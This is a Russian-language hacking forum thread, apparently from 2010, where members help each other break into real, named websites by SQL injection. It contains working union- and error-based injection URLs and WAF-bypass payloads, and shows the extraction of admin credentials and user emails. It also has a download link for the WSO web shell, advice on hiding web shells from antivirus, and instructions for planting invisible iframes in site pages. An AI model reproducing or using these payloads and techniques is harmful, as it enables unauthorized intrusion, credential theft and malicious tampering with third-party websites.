Попробовал в дбмс это все вбить, оказалось, что подобные комментарии заменяются на пустую строку - получается вида unionselect1,2, то есть одним словом, так что такие манипуляции с комментариями не сработают. Могу дать линк в ПМ, единственное, чего я хочу - это чтобы мне потом кто-то объяснил, как это можно было раскрутить
roddik said:
Попробовал в дбмс это все вбить, оказалось, что подобные комментарии заменяются на пустую строку - получается вида unionselect1,2, то есть одним словом, так что такие манипуляции с комментариями не сработают. Могу дать линк в ПМ, единственное, чего я хочу - это чтобы мне потом кто-то объяснил, как это можно было раскрутить
Это не коментарии, а один из способов разделения запроса. Скорее всего там стоит прег реплейс который заменяет ненужные символы.
AGIMI777
04.08.2010, 22:53
Fatal error: require() [function.require]: Failed opening required 'info//var/www/web6/web/index.php' (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/web6/web/index.php on line 45
что далше????????????
AGIMI777 said:
Fatal error: require() [function.require]: Failed opening required 'info//var/www/web6/web/index.php' (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/web6/web/index.php on line 45
что далше????????????
а что именно вам надо то?
AGIMI777
04.08.2010, 23:05
как я панимаю седес мой шел не работает или мне сервер запретил шел include сделать
AGIMI777 said:
как я панимаю седес мой шел не работает или мне сервер запретил шел include сделать
бешермэ..жигирмэ..шелланама не работает..шайтанама..тута форума дамахазяйканама...
AGIMI777
04.08.2010, 23:08
братва на античате все силки на скачивание закрити дайте url для скачивание шел
AGIMI777 said:
братва на античате все силки на скачивание закрити дайте url для скачивание шел
http://narod.ru/disk/18331224000/wso2.4.zip.html
AGIMI777
04.08.2010, 23:12
thenks
tompson_
04.08.2010, 23:14
-PRIVAT- said:
Линк на скулю дай.
может сразу рутшелл дать? я конкретно сформулировал вопрос. те, кто знают, ответят
tompson_
04.08.2010, 23:34
_iks_ said:
Через ошибку выводи.
это мне? если да, можно конкретнее?
Вот пример, читай то что пониже /thread119047.html
Потом гугли другие способы, если этот не прокатит.
Подскажите как на шелле с ограниченными правами можно вставить iframe ?
tompson_
05.08.2010, 00:12
_iks_ said:
Вот пример, читай то что пониже /thread119047.html
Потом гугли другие способы, если этот не прокатит.
я читал эту и другие статьи по инъекциям несколько раз. если бы я знал ответ, то не спрашивал. ты можешь предложить что-то конкретное? гуглить не подходит
tompson_ said:
может сразу рутшелл дать? я конкретно сформулировал вопрос. те, кто знают, ответят
tompson_ said:
я читал эту и другие статьи по инъекциям несколько раз. если бы я знал ответ, то не спрашивал. ты можешь предложить что-то конкретное?
гуглить
не подходит
Не груби, тут тебе никто ничем не обязан.
Как я понял, проблема в том, что параметр id обрамлен кавычками и тебе не составить верный запрос.
Крути так:
HTML:
-99999'+union+select+1,2,3+and+'1'='1
HTML:
-99999'+union+select+1,version(),3+and+'1'='1
HTML:
-999999'+union+select+1,((select+concat(table_name, 0x3a,column_name)+from+information_schema.columns+ limit+0,1)),3+and+'1'='1
И так далее
Либо отсеки ненужное комментарием -- -
HTML:
-999999'+union+select+1,((select+concat(table_name, 0x3a,column_name)+from+information_schema.columns+ limit+0,1)),3-- -
UPDATE:
Вот тебе через ошибку
HTML:
-9999'+or+1+group+by+concat((select+concat(table_na me,0x3a,column_name)+from+information_schema.colum ns+limit+0,1),floor(rand(0)*2))+having+avg(0)+and+ '1'='1
и аналогично с -- -
HTML:
-9999'+or+1+group+by+concat((select+concat(table_na me,0x3a,column_name)+from+information_schema.colum ns+limit+0,1),floor(rand(0)*2))+having+avg(0)-- -
tompson_
05.08.2010, 02:21
Redwood,
я в курсе, что мне тут никто ничем не обязан и я не грублю. сам посуди, ответы
-PRIVAT- said:
Линк на скулю дай.
или
_iks_ said:
Потом гугли другие способы, если этот не прокатит.
можно было просто не писать.
по твоему ответу,
Redwood said:
Крути так:
я написал, что в скрипте следующий запрос - UPDATE, который выплевывает ошибку.
а за
HTML:
-9999'+or+1+group+by+concat((select+concat(table_na me,0x3a,column_name)+from+information_schema.colum ns+limit+0,1),floor(rand(0)*2))+having+avg(0)+and+ '1'='1
спасибо
M.MIB said:
Подскажите как на шелле с ограниченными правами можно вставить iframe ?
все зависит от шелла, инклюды, через базу и тд и тп
happygirl
05.08.2010, 08:51
http://www.eluxbag.com/product.php?page=1&ordertype=3&keyword=&type=products&Categories=&perpagenum=32&id=434%20or%20(1,23)=(select+1+from+(select+count( 0),concat((select+concat(ID,Email)+from+userinfo+l imit+0,1),floor(rand(0)*2))+from+information_schem a.tables+group+by+2)a)--
-->
Duplicate entry '1800qqguy85@yahoo.com1' for key 1
but this is not working!
http://www.eluxbag.com/product.php?page=1&ordertype=3&keyword=&type=products&Categories=&perpagenum=32&id=434 or (1,23)=(select+1+from+(select+count(0),concat((sel ect+concat(Password)+from+userinfo+limit+0,1),floo r(rand(0)*2))+from+information_schema.tables+group +by+2)a)--
Gorev said:
все зависит от шелла, инклюды, через базу и тд и тп
Можеш объяснить подробнее или дать линк на какой нить ман, шелл wso, safe mode off, нехватает прав править морду.
M.MIB said:
Можеш объяснить подробнее или дать линк на какой нить ман, шелл wso, safe mode off, нехватает прав править морду.
да мануала как такогог нет, есть выдумка и способы обхода хитростей админа..стандартного нет ничего..все по разномy
happygirl said:
but this is not working!
You can use substring function to solve this problem
Code:
http://www.eluxbag.com/product.php?page=1&ordertype=3&keyword=&type=products&Categories=&perpagenum=32&id=434 or (1,23)=(select+1+from+(select+count( 0),concat((select+concat(ID,0x3a,substring(passwor d,1,32))+from+userinfo+limit+0,1),floor(rand(0)*2) )+from+information_schema.tables+group+by+2)a)--
kfor said:
Это не коментарии, а один из способов разделения запроса. Скорее всего там стоит прег реплейс который заменяет ненужные символы.
там берется path из url-а, в котором браузер заменяет пробелы на %20, соответственно эти %20 попадают в запрос. Пробовал передать вручную Path без пробелом - нгинкс возвращает ошибку bad request. так что видимо не получится ничего сделать как оказалось, сайт делала одна "студия", которая уже сделала довольно много сайтов (в портфолио около 100), и на всех то самое... обидно)
на ресурсе *******.com есть дыра в мускуле
в табле админ кроме логина более ничего нет
есть какой то способ попасть в админку? других уязвимостей не нащёл
через sql запрос выводятся не все данные часть данных кодирует скрипт(
Koren said:
на ресурсе *******.com есть дыра в мускуле
в табле админ кроме логина более ничего нет
есть какой то способ попасть в админку? других уязвимостей не нащёл
через sql запрос выводятся не все данные часть данных кодирует скрипт(
посмотри в других табличках..бывало и такое что пасс в другой табле был, выводи вручную и будет тебе счастьe
maks-gold
06.08.2010, 19:26
Подскажите пожалуйсто брут для подбора пасса к извесному лагину. Что не качаю все с вирусом или не пашет.
Gorev said:
посмотри в других табличках..бывало и такое что пасс в другой табле был, выводи вручную и будет тебе счастьe
перед тем как оставить пост так и сделал дружище
[Feldmarschall]
06.08.2010, 23:49
maks-gold said:
Подскажите пожалуйсто брут для подбора пасса к извесному лагину. Что не качаю все с вирусом или не пашет.
WTF ?! О.о
Koren said:
перед тем как оставить пост так и сделал дружище
админ панель login - password ?
бывают просто авторизация через passwd или логин.
Хай всем.
Есть скуля на одном сайте, уязвимый параметр - массив. Передаю
param7[]=12¶m7[]=13, пишет:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '12,13-1 group by ah.id order by ah.hotel_rating desc' at line 18
Инъекция не после WHERE, т.к. значений можно передать много, а в запросе, как видно, они перечислены через запятую. Пробывал ставить комментарий %23 (на сайте есть другая бестолковая скуля, в ней мускул такой комментарий хавает), пробовал ставить закрывающие скобки - всё равно пишет ошибку.
Знающие люди, подскажите какой там может быть запрос.
Star_s said:
Хай всем.
Есть скуля на одном сайте, уязвимый параметр - массив. Передаю
param7[]=12¶m7[]=13
, пишет:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
12,13-1 group by ah.id order by ah.hotel_rating desc
' at line 18
Инъекция не после WHERE, т.к. значений можно передать много, а в запросе, как видно, они перечислены через запятую. Пробывал ставить комментарий %23 (на сайте есть другая бестолковая скуля, в ней мускул такой комментарий хавает), пробовал ставить закрывающие скобки - всё равно пишет ошибку.
Знающие люди, подскажите какой там может быть запрос.
Если честно я ваапще не понял что ты передаёшь. Кинь прям сылку без сайта как ты проводишь инъекцию, а то я например вааще ничё не понял.
daniel_1024
07.08.2010, 11:13
уязвимый параметр - массив
0_0
линк плиз
http://site.com/search/?search[hotel_name]=Aurora&search[region]=12&search[price]=0&amenidh[]=10&amenidh[]=11&amenidh[]=12&amenidh[]=13-1
$amenidh не фильтруется
ILYAtirtir
07.08.2010, 22:15
Дауж Кинь ссылку уже...
ILYAtirtir, что "да уж"? Что такого необычного?
ILYAtirtir
07.08.2010, 22:24
В лс тогда кинь ссылку если палить не хочешь
ILYAtirtir, вот линк
http://ahotel-spb.ru/additional_search/
POSTом отправляешь запрос:
search[s_hotel_name]=%25&search[s_hotel_region]=12&search[s_hotel_pay]=0&search[s_hotel_station]=0&search[s_hotel_adults]=1&search[s_hotel_subway]=0&amenidh[]=12&amenidh[]=13-1&amenidr[]=
ошибка:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '12,13-1 group by ah.id order by ah.hotel_rating desc' at line 19
нашёл скулю, узнал колличество столюбцов, но при попытке узнать имя таблицы лезет такая шляпа.
SELECT Error: Access denied for user 'sitename_mysql'@'ip.ip.ip.ip' to database 'information_schema'
что делать?
zlo12 said:
нашёл скулю, узнал колличество столюбцов, но при попытке узнать имя таблицы лезет такая шляпа.
что делать?
видно что не знаете английский.
нету доступа к базе information_schema
Konqi said:
видно что не знаете английский.
нету доступа к базе information_schema
дык это-то я понял, а обойти никак?
Seravin said:
брут таблиц и колонок
ок, спс, помогло
нашел скул на одном сайте , раскрутил все норм. потом узнал что есть тот же домен на других зонах .ca u .com , на них стоит тот же двиг но при попытке заюзать скул (+union+select и тд) выдает
"Forbidden
You don't have permission to access /index.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request." и так везде ((
можно както обойти фильтр ?
Продолжать крутить скули если появляется страница с надписью "hacking attempt"?
SEWERN said:
нашел скул на одном сайте , раскрутил все норм. потом узнал что есть тот же домен на других зонах .ca u .com , на них стоит тот же двиг но при попытке заюзать скул (+union+select и тд) выдает
"Forbidden
You don't have permission to access /index.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request." и так везде ((
можно както обойти фильтр ?
А зачем крутить скуль на алиасах? Алиасы на другом сервере? Если на одном, то заливай шелл и получишь доступ и к алиасам.
А что касается фильтра, то urlencode пробуй или поиграйся с регистром букв в запросах.
SEWERN said:
нашел скул на одном сайте , раскрутил все норм. потом узнал что есть тот же домен на других зонах .ca u .com , на них стоит тот же двиг но при попытке заюзать скул (+union+select и тд) выдает
"Forbidden
You don't have permission to access /index.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request." и так везде ((
можно както обойти фильтр ?
WAF, судя по всему.
Некоторые варианты из многих возможных:
HTML:
-9999+/*!12345union*/+/*!12345select*/+1,2,table_name,4,5+/*!12345from*/+information_schema.tables
HTML:
-9999+/*!union+select+1,2,table_name,4,5+from+information _schema.tables*/
HTML:
-9999+/*%00*/union/*%00*/+/*%00*/select/*%00*/+1,2,table_name,4,5+/*%00*/from/*%00*/+information_schema.tables
HTML:
-9999+/*!union*/+/*!select*/+1,2,table_name,4,5+/*!from*/+information_schema.tables
HTML:
-9999/*!union+select+1,2,table_name,4,5+'aaa'from+inform ation_schema.tables*/
Либо если есть возможность, то отправлять POST' ом, либо подзапросы.
legaljo said:
Продолжать крутить скули если появляется страница с надписью "hacking attempt"?
продолжай...
да , сайты на других серверах.
Всем спасибо , попробую urlencode и варианты от Redwood.
Как вставить ifraim в тело index.php чтобы главная страница не умерла???
manmerritt0
08.08.2010, 22:31
Всем привет! Я недавно начал изучать эту тему, поэтому прошу строго не ругать, если допущу какие-либо неточности в терминологии.
Вобщем такой вопрос:
Добыл доступ к админки одного маленького буржуйского шопа, нашел способ залить через нее веб шелл. Залил последнюю версию wso 2, захожу на шелл, а у меня там ограничено все, что только можно:
Safe-mode: ON
open_basedir, где прописан только адрес папки в которой лежит шелл + папки /tmp
Chmod: ---------, т.е. походу вообще ничего нельзя делать
Залил другой шелл: c99 от madnet - тоже самое.
Залил шелл r57 от wolfa - все стало гораздо лучше:
Safe-mode: OFF
open_basedir - нет ограничений
Chmod:drwxrwxrwx
Что не так с двумя первыми шеллами? Просто имхо r57 самый неюзабельный.
P.S. Chmod я указывал тот, что стоит рядом с адресом директории, в которую залит шелл.
manmerritt0 said:
Всем привет! Я недавно начал изучать эту тему, поэтому прошу строго не ругать, если допущу какие-либо неточности в терминологии.
Вобщем такой вопрос:
Добыл доступ к админки одного маленького буржуйского шопа, нашел способ залить через нее веб шелл. Залил последнюю версию wso 2, захожу на шелл, а у меня там ограничено все, что только можно:
Safe-mode: ON
open_basedir, где прописан только адрес папки в которой лежит шелл + папки /tmp
Chmod: ---------, т.е. походу вообще ничего нельзя делать
Залил другой шелл: c99 от madnet - тоже самое.
Залил шелл r57 от wolfa - все стало гораздо лучше:
Safe-mode: OFF
open_basedir - нет ограничений
Chmod:drwxrwxrwx
Что не так с двумя первыми шеллами? Просто имхо r57 самый неюзабельный.
P.S. Chmod я указывал тот, что стоит рядом с адресом директории, в которую залит шелл.
да н еможет быть такого что при первых двух сейф мод он а на р57 офф, это настройки сервера и накак не шелла..что то нереальное говоришь...и еще чем это неюзабельный р57? вообще самый юзабельный шелл
manmerritt0
08.08.2010, 22:55
Gorev said:
да н еможет быть такого что при первых двух сейф мод он а на р57 офф, это настройки сервера и накак не шелла..что то нереальное говоришь...и еще чем это неюзабельный р57? вообще самый юзабельный шелл
Ладно, отбросим вопрос о юзабельности того или иного шелла. Это дело вкуса и опыта.
Меня больше интересует, почему ограничения при разных залитых шеллах разные. Ты говоришь, что этого не может быть, но тем не мене так есть. Меня это тоже очень сильно удивило.
А, вот еще чем мне не нравится r57: он дико палится антивирусами, а тот же wso2 мой касперский пока не замечает.
manmerritt0 said:
Ладно, отбросим вопрос о юзабельности того или иного шелла. Это дело вкуса и опыта.
Меня больше интересует, почему ограничения при разных залитых шеллах разные. Ты говоришь, что этого не может быть, но тем не мене так есть. Меня это тоже очень сильно удивило.
А, вот еще чем мне не нравится r57: он дико палится антивирусами, а тот же wso2 мой касперский пока не замечает.
а ты его криптовать пробовал? если нет,то это и не удивительно что он у тебя палится...
M.MIB said:
Как вставить ifraim в тело index.php чтобы главная страница не умерла???
А почему она должна умереть?))
Находи тот участок кода, который выводит текст на страницу. Например контакты организации. И в конце строки вставляй свой iframe, только не забудь поставить width и height в ноль и visible:no.
manmerritt0
09.08.2010, 00:01
547 said:
а ты его криптовать пробовал? если нет,то это и не удивительно что он у тебя палится...
Нет не пробовал. Я собственно начал учится этой теме только неделю назад. Читал много статей на тематических форумах и ни в одной из них не поднимался вопрос криптовки веб шеллов.
Так что спасибо, буду разбираться и с этим вопросом.
Gorev said:
продолжай...
Ну может аргументацию хоть какую-нибудь чтоле?
manmerritt0 said:
Ладно, отбросим вопрос о юзабельности того или иного шелла. Это дело вкуса и опыта.
Меня больше интересует, почему ограничения при разных залитых шеллах разные. Ты говоришь, что этого не может быть, но тем не мене так есть. Меня это тоже очень сильно удивило.
А, вот еще чем мне не нравится r57: он дико палится антивирусами, а тот же wso2 мой касперский пока не замечает.
Бывает что фаервол так настроен что ВСО и МАД палятца и полная жопа способов обойти пока не нашел=), а р57 работает (он кстате реально более практичный и функциональный, а то что палитца анвирам, ты его wget'ом просто на сервак, и не какой запары с криптовкой )
manmerritt0, что ты про Safe_mode написал - такого точно не может быть. механизм получения значения "Safe_mode" одинаковый:
$safe_mode = @ini_get('safe_mode');
может, когда ты залил первые два шелла, safe_mode было On, а потом админ поставил в Off, и ты как раз залил r57 ) В такое я скорее поверю )
Dare said:
Бывает что фаервол так настроен что ВСО и МАД палятца и полная жопа способов обойти пока не нашел=), а р57 работает (он кстате реально более практичный и функциональный, а то что палитца анвирам, ты его wget'ом просто на сервак, и не какой запары с криптовкой )
не обижайся но это бред!
.:[melkiy]:.
09.08.2010, 13:25
мда... в r57 есть возможность обходить ограничения safe_mode, open_basedir,etc..
читать (https://antichat.live/showthread.php/t/7888/)
:."]
.:[melkiy]:. said:
мда... в r57 есть возможность обходить ограничения safe_mode, open_basedir,etc..
читать (https://antichat.live/showthread.php/t/7888/)
во всех шеллах есть методы обхода сейф мода...но не так что бы на серванте поменять..а файлы почитать, в другую папку перепрыгнуть и тд и тп... если бы шеллы могли настройки сервера менять то и рутать не надо было бы никогда
manmerritt0
09.08.2010, 15:12
может, когда ты залил первые два шелла, safe_mode было On, а потом админ поставил в Off, и ты как раз залил r57 ) В такое я скорее поверю )
кстати, после заливки шелла буквально через 10 минут sql уязвимость, через которую были добыты пароли, исчезла. Врядли админы будут выключать safe_mod после того, как увидели уязвимость. Тем более, что у меня там сейчас залито все 3 шелла(wso2,c99,r57) и все также:на 2-х safemod on, на r57-off
Бывает что фаервол так настроен что ВСО и МАД палятца и полная жопа способов обойти пока не нашел=), а р57 работает
А и правда, что насчет фаерволлов и антивирусов? Я сам задумывался над этим, но информации не нашел. Может на том сервере стоят определенные средства защиты, которые по тем или иным причинам палят только wso2 и c99?
Только что случайно заметил, что на сервере есть юзер drweb.
Он может быть причиной таких непоняток? Но почему тогда он пропустил r57?
legaljo said:
Продолжать крутить скули если появляется страница с надписью "hacking attempt"?
АП. шелл отличный..
я же тебе сказал продолжай крутить.крутить скулю значит что ты уже нашел багу и в процесе раскручивания уязвимости у тебя появляется надпись "hacking attempt"..это означает что там стоит какой нить фильтр..и тебе прийдется его обойти..... если конечно ты не мега кул хацкер и просто подставил ковычку и и назвал это раскручивать скуль !!!
вопрос из разряда нубских..и я очень удивлен что твой пост еще жив ..так мало того еще и ап ему сделал...
Но Слава Богу 1 сентября уже скоро....
есть уязвимость вида product.php?id=-82+union+select+1,2,3,4--
колонки подбираются без проблем, но информацию не выдаёт
подумал может фильт заменял union+select как только можно, нет...
слышал такая ситуация уже разбиралась, но ответа не нащёл(
подскажит кто?
Koren said:
есть уязвимость вида product.php?id=-82+union+select+1,2,3,4--
колонки подбираются без проблем, но информацию не выдаёт
подумал может фильт заменял union+select как только можно, нет...
слышал такая ситуация уже разбиралась, но ответа не нащёл(
подскажит кто?
выложи линк посмотрим...
Koren said:
есть уязвимость вида product.php?id=-82+union+select+1,2,3,4--
колонки подбираются без проблем, но информацию не выдаёт
подумал может фильт заменял union+select как только можно, нет...
слышал такая ситуация уже разбиралась, но ответа не нащёл(
подскажит кто?
плохо искал если не нашел >>>>> (https://antichat.live/threads/104591/)
manmerritt0 said:
...Врядли админы будут выключать safe_mod после того, как увидели уязвимость. Тем более, что у меня там сейчас залито все 3 шелла(wso2,c99,r57) и все также:на 2-х safemod on, на r57-off
....
Так проведем простой эксперимент: залей на сервак простой скриптик с таким содержанием:
Code:
Запроси его через web. Какое значение имеет параметр safe_mode?
manmerritt0
09.08.2010, 20:08
Запроси его через web. Какое значение имеет параметр safe_mode?
Запросил.
Local value: safe_mod on, + ограничения с помощью open_basedir.
Master value :safe_mod off, open_basedir: no_value
Насколько я понимаю на master value не стоит обращать внимание? Это параметры для рута?
Привет, друзья.
А есть ли на нашем уютненьком статья, раскрывающая тему LFI и/или RFI? По поиску находится множество тем с обсуждением конкретных примеров, но вот статей о данном типе уязвимости я, честно говоря, не нашел.
fl00der said:
Привет, друзья.
А есть ли на нашем уютненьком статья, раскрывающая тему LFI и/или RFI? По поиску находится множество тем с обсуждением конкретных примеров, но вот статей о данном типе уязвимости я, честно говоря, не нашел.
/threadnav12123-1-10.html
/thread23501.html
подсказывали подсказывали, не получилось ничего(
http://www.sweetstems.com.au/product.php?id=82+union+select+1,2,3,4--
помогаем.. плыз
Koren said:
подсказывали подсказывали, не получилось ничего(
помогаем.. плыз
http://www.sweetstems.com.au/product.php?id=82+or+(1,1)=(select+count(0),concat ((select+version()+from+information_schema.tables+ limit+0,1),floor(rand(0)*2))from(information_schem a.tables)+group+by+2)--+
Gorev said:
я же тебе сказал продолжай крутить.крутить скулю значит что ты уже нашел багу и в процесе раскручивания уязвимости у тебя появляется надпись "hacking attempt"..это означает что там стоит какой нить фильтр..и тебе прийдется его обойти.....
Спаасибо
manmerritt0
10.08.2010, 14:54
Созрело еще несколько вопросов и просьба:
Просьба:
Кто-нибудь может поделится шеллами r57 eleckt edition и r57 antichat edition? Очень хочется попробовать их в действии, но все ссылки, которые я находил, были либо со стремых азиатских и буржуйских сайтов, либо просрочены в файлообменниках. Желательно, чтобы шеллы были не закодированы.
Вопросы:
1. Бывают такие ситуации, когда веб шелл работает с правами apache или nobody, а большинство файлов (тот же index.php) принадлежат доругому пользователю(чаще всего его название созвучно с доменным именем сайта), и права на запись установлены только для этого пользователя. В этих ситуациях есть способы правки индекса, кроме получения рута на серваке?
2. Почему вообще веб шеллы на разных сайтах принадлежат различным пользователям? Просто раньше думал, что залитый вебшелл(на любой сайт) всегда будет иметь права apache, и все файлы в папке сайта будут тоже иметь права apache и с легкостью редактироваться.
3. FTP аккаунт владельца сайта(если я его добуду) какие будет иметь права? Тоже на разных сайтах разные?
4. При подключении к порту который я забиндил или же при подключении через бекконнект к атакуемому серверу, какие у меня будут права? Такие же как и у веб шелла? Какие это вообще дает преимущества, кроме потенциальной возможности запуска эксплоита с целью повышения прав?
Извиняйте, если вопросы, которые я задаю, являются банальными или уже не раз обсуждались. Я честно искал ответы в гугле, но так ничего и не нашел.
manmerritt0 said:
1. Бывают такие ситуации, когда веб шелл работает с правами apache или nobody, а большинство файлов (тот же index.php) принадлежат доругому пользователю(чаще всего его название созвучно с доменным именем сайта), и права на запись установлены только для этого пользователя. В этих ситуациях есть способы правки индекса, кроме получения рута на серваке?
Получить права владельца файлов, например через ftp или ssh.
2. Почему вообще веб шеллы на разных сайтах принадлежат различным пользователям? Просто раньше думал, что залитый вебшелл(на любой сайт) всегда будет иметь права apache, и все файлы в папке сайта будут тоже иметь права apache и с легкостью редактироваться.
Права apache(nobody,www,www-data и т.д.) только на серверах, где ServerApi Apache. Иначе, скрипты запускаются от пользователя сайта и принадлежат все файлы в папке сайта пользователю - это при Server Api CGI\FCGI
3. FTP аккаунт владельца сайта(если я его добуду) какие будет иметь права? Тоже на разных сайтах разные?
Как правило, пользователя(владельца сайта)
Помогите, есть ли какой-нибудь рабочий софт для поиска админки на сайте?
legaljo said:
Помогите, есть ли какой-нибудь рабочий софт для поиска админки на сайте?
IntelliTamper - сканер директорий.
Reiluke AdminFinder - ищет админку, по средствам брута всех возможных адресов.
http://site.ru/text.php?page='
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/soup/public_html/site.ru/text.php on line 32
Если это инъекция ,возможно ли как-то извлечь данные?
QDef said:
http://site.ru/text.php?page='
Если это инъекция ,возможно ли как-то извлечь данные?
возможно, но только с линком)
legaljo said:
Помогите, есть ли какой-нибудь рабочий софт для поиска админки на сайте?
ArxScanSite - пользую эту!
вот в режиме онлайн http://fiascowines.ca/images/gallery/scan.php?
Electr0n
11.08.2010, 01:38
Фильтруется этот параметр? Чем можно заменить?
Code:
group_concat(table_name+separator+0x7c)+from+infor mation_schema.tables+where+table_schema=
Electr0n said:
Фильтруется этот параметр? Чем можно заменить?
Code:
group_concat(table_name+separator+0x7c)+from+infor mation_schema.tables+where+table_schema=
скажи что именно фильтруется
Electr0n
11.08.2010, 02:11
Konqi, что именно не могу понять, как проверить?
А что именно то у тебя фильтруется???мб доступа нету к схеме?
Electr0n said:
Konqi
, что именно не могу понять, как проверить?
Потести разные словa,
union, select, group_concat, table_name, и т.п.
ошибка - не фильтрирует
forbidden - фильтрирует
если конечно это mod_security
Electr0n
11.08.2010, 02:26
Konqi, Вот так пропускает /*!UnIoN+SeLeCt*/ ошибки нет...
Как остальные запросы фильтровать?
Electr0n said:
Konqi
, Вот так пропускает /*!UnIoN+SeLeCt*/ ошибки нет...
Как остальные запросы фильтровать?
/showpost.php?p=2289579&postcount=14624
Electr0n said:
Konqi
, Вот так пропускает /*!UnIoN+SeLeCt*/ ошибки нет...
Как остальные запросы фильтровать?
обход тем же способом что и union select
/threadnav46016-1343-10.html
Electr0n
11.08.2010, 02:51
Посмотрите пожалуйста фильтр, попробовал не получилось вывести таблицы...
Code:
http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,version(),3,4,5,6,7--
Electr0n said:
Посмотрите пожалуйста фильтр, попробовал не получилось вывести таблицы...
Code:
http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,version(),3,4,5,6,7--
http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,table_name,3,4,5,6,7+from+information_schema.%6 0tables%60--
Electr0n
11.08.2010, 03:02
Допустим... хочу вывести все таблицы моим запросом group_concat(table_name+separator+0x7c)+from+infor mation_schema.tables+where+table_schema= как тут быть с фильтром?
Если можно сразу пример...
Electr0n said:
Допустим... хочу вывести все таблицы моим запросом group_concat(table_name+separator+0x7c)+from+infor mation_schema.tables+where+table_schema= как тут быть с фильтром?
Если можно сразу пример...
http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,group_cOnCaT%28TabLe_naMe%29,3,4,5,6,7+from+inf ormation_schema.%60tables%60--
Electr0n
11.08.2010, 03:29
поправьте что не так.. не выводит данные
Code:
http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,cOnCaT(name,0x3a,password),3,4,5,6,7+from+0x616 46d696e--
Electr0n
11.08.2010, 04:03
Seravin, да как видишь...
а может лучше мануал хоть один сначала прочитать прежде чем спрашивать?
Electr0n
11.08.2010, 04:16
Seravin, ты можешь помочь или только к манумалам можешь отправить?
Electr0n said:
Seravin
, ты можешь помочь или только к манумалам можешь отправить?
так нельзя
2 seravin это не хэш это hex
2Konqi ну тоже верно) hex) но надо людей сначала отправлять читать мануалы, а то ж нифига не научаться если их на путь правильный наставлять.
P.S. Залазь в асю или вылазь из инвиза
Electr0n
11.08.2010, 04:25
Konqi, можешь помочь?
Electr0n said:
Konqi
, можешь помочь?
в чем помочь? я же сказал нельзя писать имя таблицы в таком виде, пиши так как есть
Electr0n
11.08.2010, 04:36
Konqi,
Я сделал так первым делом:
Code:
http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,group_cOnCaT(name,0x3a,password),3,4,5,6,7+from +admin--
то же самое... не работает
Electr0n said:
Konqi
,
Я сделал так первым делом:
Code:
http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,group_cOnCaT(name,0x3a,password),3,4,5,6,7+from +admin--
то же самое... не работает
http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,group_cOnCaT(name,0x3a,password),3,4,5,6,7+from +swizzel_maxxhitsads.admin--
Electr0n
11.08.2010, 04:48
Konqi, там же просто админ был... почему swizzel_maxxhitsads.admin?
Electr0n said:
Konqi
, там же просто админ был... почему swizzel_maxxhitsads.admin?
таблица находится в другой базе
BrainDeaD
11.08.2010, 04:59
Konqi, выводишь базы через SELECT schema_name или SELECT distinct() ?
BrainDeaD said:
Konqi, выводишь базы через SELECT schema_name или SELECT distinct() ?
table_schema
linuxkernal
11.08.2010, 14:19
i use order by 1 and no error and page load normally
but
http://www.webmeter.ws/webstats.php?user=291035+union+select+1--
The used SELECT statements have a different number of columns
linuxkernal said:
i use order by 1 and no error and page load normally
but
http://www.webmeter.ws/webstats.php?user=291035+union+select+1--
The used SELECT statements have a different number of columns
http://www.webmeter.ws/webstats.php?user=291035+or+(1,1)=(select+count(0) ,concat((select+concat_ws(concat(char(32),char(58) ,char(32)),user(),version(),database(),@@version_c ompile_os)+from+information_schema.tables+limit+0, 1),floor(rand(0)*2))from(information_schema.tables )+group+by+2)--+
поправте линк плыз
http://bgia.bard.edu/index.php?id=-30+or+(1,1)=(SeLeCt+/*count*/(0),CoNCat((SeLeCt+version()+/*from*/+information_schema.%60tables%60+limit+0,1),/*floor*/(RaNd(0)*2))/*from*/(information_schema.%60tables%60+group+by+6)--+
stepashka_
11.08.2010, 17:34
Подскажите вот через эту админку
http://s60.radikal.ru/i170/1008/5d/3845158f7c22.jpg
Можно залить шелл?
stepashka_ said:
Подскажите вот через эту админку
http://s60.radikal.ru/i170/1008/5d/3845158f7c22.jpg
Можно залить шелл?
можно >>>>>> (https://antichat.live/threads/150144/)
http://materinstvo.ru/art/683'
Реально ли раскрутить такую скулю? парился-парился нифига не вышло...
[Feldmarschall]
11.08.2010, 22:42
ZARO said:
http://materinstvo.ru/art/683'
Реально ли раскрутить такую скулю? парился-парился нифига не вышло...
и с чего ты решил что там должна быть скуль?
.:[melkiy]:.
11.08.2010, 22:46
"]
[Feldmarschall] said:
и с чего ты решил что там должна быть скуль?
удали фф =\
через оперу подставь кавычку и увидишь
[Feldmarschall]
11.08.2010, 22:56
:."]
.:[melkiy]:. said:
удали фф =\
через оперу подставь кавычку и увидишь
опа, просто к фф привык )
stepashka_
11.08.2010, 23:16
Gorev said:
можно
>>>>>> (https://antichat.live/threads/150144/)
Нет у меня в админке таких настроек.
Если не сложно стукни в асю мне..
"]
[Feldmarschall] said:
и с чего ты решил что там должна быть скуль?
Угу) в фф показывать не хочет) вот сижу и парюсь, пока безрезультатно)
А как это так, что в лисе не показывает?
И че, так вот под ФФ и проходят скули мимо?
Помогите достроить запрос чтоб при комменте не выдавал ошибку
site.ru/index.php?id=12--+
